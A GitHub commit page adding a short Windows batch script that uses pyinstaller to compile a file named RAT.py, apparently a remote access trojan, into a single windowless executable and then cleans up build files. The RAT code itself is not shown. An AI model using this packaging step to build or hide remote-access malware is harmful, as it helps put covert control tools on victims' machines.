Skip to content

Commit 48affff

Browse files
authored
Create compile.bat
1 parent b674468 commit 48affff

File tree

1 file changed

+10
-0
lines changed

1 file changed

+10
-0
lines changed

GIFS/compile.bat

+10
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
echo off
2+
3+
pyinstaller --clean --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole RAT.py
4+
5+
del /s /q /f RAT.spec
6+
rmdir /s /q __pycache__
7+
rmdir /s /q build
8+
9+
:cmd
10+
pause null

0 commit comments

Comments
 (0)